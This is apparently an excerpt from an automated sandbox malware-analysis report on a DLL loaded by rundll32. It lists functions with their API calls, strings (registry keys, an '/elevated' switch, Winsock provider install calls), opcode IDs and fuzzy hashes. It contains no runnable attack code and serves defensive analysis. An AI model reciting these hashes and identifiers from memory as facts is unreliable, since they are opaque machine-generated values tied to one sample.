                                                                  Function 00000001800184B8 Relevance: 9.3, APIs: 6, Instructions: 270COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$??3@
                                                                  • String ID:
                                                                  • API String ID: 652292005-0
                                                                  • Opcode ID: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
                                                                  • Instruction ID: 16cab60fb696caa1ac382d07db4514fcd7f2788f0d4e97422f2d8c76aa010f09
                                                                  • Opcode Fuzzy Hash: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
                                                                  • Instruction Fuzzy Hash: 95C14A32B00B449AEB61CFA1E8407DD33B6F748798F548125EE9967B98DF34C62AD344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180004D74 Relevance: 9.2, APIs: 6, Instructions: 219COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcsstr$_errnomemmove
                                                                  • String ID:
                                                                  • API String ID: 3323953840-0
                                                                  • Opcode ID: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
                                                                  • Instruction ID: 824f22201ec0d57d4a2227744580b71807502b4fbd2fda829f419a9b6e1dff6e
                                                                  • Opcode Fuzzy Hash: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
                                                                  • Instruction Fuzzy Hash: CF810572701A4881EAA6DB14A4447AE77A0FB4CBE4F15C215FFAE4B7D4DE38C6498704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800505E0 Relevance: 9.2, APIs: 6, Instructions: 196networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Deinstall$ProviderProvider32$CleanupStartup
                                                                  • String ID:
                                                                  • API String ID: 348239931-0
                                                                  • Opcode ID: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
                                                                  • Instruction ID: c360e4d789f3669f84b45de69cf2c2640493478b51e108b497c61621dba60db4
                                                                  • Opcode Fuzzy Hash: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
                                                                  • Instruction Fuzzy Hash: 48910332604A88C6EB92CB65E4547EE77A4F78C7E4F618111FA8D276A4DF39C649CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180032E5C Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                  • String ID:
                                                                  • API String ID: 195827-0
                                                                  • Opcode ID: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
                                                                  • Instruction ID: 472ff7a9124bb4c66568a88574ce92508997c8508967d0cb70e73e2f7ddd2399
                                                                  • Opcode Fuzzy Hash: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
                                                                  • Instruction Fuzzy Hash: B951BD32701A4886EB46DF65D8403AD73B0FB49BE4F098621EB2957BE9DF38C959C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180034178 Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                  • String ID:
                                                                  • API String ID: 195827-0
                                                                  • Opcode ID: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
                                                                  • Instruction ID: d6e040c62356dd28a52f4054929385a923e12d2376c870478276763e31a13ced
                                                                  • Opcode Fuzzy Hash: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
                                                                  • Instruction Fuzzy Hash: 9D516F33701B4982EB469F65D85039E63A0FB89FA4F498221EB295B7D9DF38C549C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800322A0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocHeapProcess
                                                                  • String ID:
                                                                  • API String ID: 195827-0
                                                                  • Opcode ID: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                  • Instruction ID: b9a7bc9aefba1d0cd95c21a72bfdce90d94dfcaa7ac1bda6bd9d80d9113677c1
                                                                  • Opcode Fuzzy Hash: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
                                                                  • Instruction Fuzzy Hash: 55516032701B4882EB469F65D85039E73A0FB49FE4F098625EB69577D9DF38C649C380
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003288C Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@Free$AttributesFile$??2@AllocHeapProcess
                                                                  • String ID:
                                                                  • API String ID: 2343307612-0
                                                                  • Opcode ID: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                  • Instruction ID: 3edc698dfee31cca13762dbc840380725e1013da3230f8d99093220343b8c6e9
                                                                  • Opcode Fuzzy Hash: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
                                                                  • Instruction Fuzzy Hash: 21515F32701B4882EB46DF65D85039D73A0FB49FA4F098225EB695B7E9DF38C949C380
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180026754 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 142stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpimemset
                                                                  • String ID: ShellEx\IconHandler$\DefaultIcon$clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\${42042206-2D85-11D3-8CFF-005004838597}
                                                                  • API String ID: 3784069311-1340094651
                                                                  • Opcode ID: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                  • Instruction ID: 9f0af0b831dc55336fcff299f0060eabbe44d87f67dffe850d980bb31fffbbb0
                                                                  • Opcode Fuzzy Hash: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
                                                                  • Instruction Fuzzy Hash: 0251A672601E4982EB52DB29D8817DE6760FB897F4F508312FA6D436E5DF38C689C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800503B8 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
                                                                  • String ID:
                                                                  • API String ID: 3103530258-0
                                                                  • Opcode ID: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                  • Instruction ID: b0c21a69e9994dd49745b429a24057b93f4d6bf7018e4c24e81fb4468a7e2a6c
                                                                  • Opcode Fuzzy Hash: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
                                                                  • Instruction Fuzzy Hash: 0051AF32711A4882EB82CF29D8843DE7761F789BE8F549211FE69176A5DF39C64AC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180066808 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValuewcsstr
                                                                  • String ID: "%s" %s$/elevated
                                                                  • API String ID: 1248106594-1382985213
                                                                  • Opcode ID: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                  • Instruction ID: f3329ece6a2879d43efc8f52936060a6c90d44f89bf07b9cf1bbe3f09b4200fa
                                                                  • Opcode Fuzzy Hash: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                  • Instruction Fuzzy Hash: E241A432702B4489EB95CF65D8407DC33A5FB88BD4F15861AAE5E53BA4DF34C659C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180068954 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 000000018006A424: RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,0000000180068993,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A44B
                                                                  • memset.MSVCRT ref: 00000001800689A4
                                                                    • Part of subcall function 000000018006A490: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,00000001800689D0,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A4A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: OpenQueryValuememset
                                                                  • String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
                                                                  • API String ID: 733315865-1479031278
                                                                  • Opcode ID: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                  • Instruction ID: ca32e24e8d646fa6672ed224415891838e44a9bb2fa0ab3c5403e0472a1cb0df
                                                                  • Opcode Fuzzy Hash: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                  • Instruction Fuzzy Hash: DA411972B00B149AFB92DBA5D8447DD73B5BB487C8F148A16AE6853B58EF34C708CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000D19C Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@memset$??3@memmove
                                                                  • String ID:
                                                                  • API String ID: 1691405456-0
                                                                  • Opcode ID: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
                                                                  • Instruction ID: 4c03d6f838081a40abf5c4ade735ff692b1a288c63e34611b63fa987e6e302c4
                                                                  • Opcode Fuzzy Hash: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
                                                                  • Instruction Fuzzy Hash: C7419F72311B9C81EA95CB65E5483AC73A5E748BE0F25C726AA7D07BD5DF38C289C310
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180052E84 Relevance: 9.1, APIs: 6, Instructions: 87networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CleanupEnterErrorInstallLastLeaveNameSpaceStartupmemset
                                                                  • String ID:
                                                                  • API String ID: 3860525367-0
                                                                  • Opcode ID: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                  • Instruction ID: 37d746e663b56e28a6a3e394405e8b675d481f719bc3bdb0db42ce8d24bf20fd
                                                                  • Opcode Fuzzy Hash: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                  • Instruction Fuzzy Hash: 57316E31700A4886F6A29F25EC443E973A0FB8DBD5F548531B96A972A1DF39C7898700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180015128 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 327COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalSectionTick$CloseEnterLeaveOpenQueryValue
                                                                  • String ID: dfsu11yy38277*(*6fhjsdkfds
                                                                  • API String ID: 4271658480-2650022146
                                                                  • Opcode ID: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
                                                                  • Instruction ID: dce0af6b373f41b2cde99525f258e7f40e176b48fd2bd51a90361080345aed67
                                                                  • Opcode Fuzzy Hash: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
                                                                  • Instruction Fuzzy Hash: 1DE19932200A0896EB92DB65E8443DD67A1F78DBD8F908125FE9D4B7A5DF38C789C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180064338 Relevance: 9.1, APIs: 6, Instructions: 67fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$Size$CloseCreateHandleRead
                                                                  • String ID:
                                                                  • API String ID: 1601809017-0
                                                                  • Opcode ID: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                  • Instruction ID: 513f97a3dac13d024bc23301dce07c49bc5a225dcf8c593d0dc48b4e525c804c
                                                                  • Opcode Fuzzy Hash: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                  • Instruction Fuzzy Hash: 2E21803260475487E7819F2AE8443997BA1F788FD0F658225EF6547BA4DF38C64ACB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004CD44 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 279COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$??3@
                                                                  • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                  • API String ID: 1245774677-781996053
                                                                  • Opcode ID: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                  • Instruction ID: 9fcea3ce77e1ed4f5330bab62f44b4aa9bf918aefdaa2edac95f8aa4354510da
                                                                  • Opcode Fuzzy Hash: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                  • Instruction Fuzzy Hash: E6C14132205F8481DAA1CF15F98039EB3A4F789BE4F598625EAED47B98CF38C155C744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004687C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 248COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@
                                                                  • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                  • API String ID: 1936579350-781996053
                                                                  • Opcode ID: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
                                                                  • Instruction ID: d1be57a1d71c98b0b77dd863bddb056ffd98aca7a61043883bc55f1bcd24f70e
                                                                  • Opcode Fuzzy Hash: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
                                                                  • Instruction Fuzzy Hash: 46A1CB72B01F5882EA55DF25D98439C33A4E708BF8F1A8315EA68477E4EF34C69AC345
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180040418 Relevance: 8.9, APIs: 7, Instructions: 155sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004048F
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404A5
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404DD
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040553
